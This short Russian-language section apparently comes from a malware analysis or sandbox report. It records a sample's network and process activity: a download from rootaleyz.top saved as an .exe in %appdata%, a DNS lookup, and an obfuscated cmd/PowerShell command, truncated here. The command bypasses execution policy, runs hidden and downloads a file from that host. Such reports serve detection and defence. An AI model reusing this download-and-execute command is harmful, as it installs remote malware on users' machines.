Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWers^he^L^L.eX^e^ ^-e^XEc^Ut^ionpOl^iCy ^BY^paSS ^-nOp^Ro^Fil^E^ -wIN^do^ws^t^yLe HI^d^den ^(New^-objE^cT syst^EM.^Ne^t.weBCLi^e^nt^).dOwN^LOaDfil^e('http://rootaleyz.top/re...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /c "poWers^he^L^L.eX^e^ ^-e^XEc^Ut^ionpOl^iCy ^BY^paSS ^-nOp^Ro^Fil^E^ -wIN^do^ws^t^yLe HI^d^den ^(New^-objE^cT syst^EM.^Ne^t.weBCLi^e^nt^).dOwN^LOaDfil^e('http://rootaleyz.top/re...' (со скрытым окном)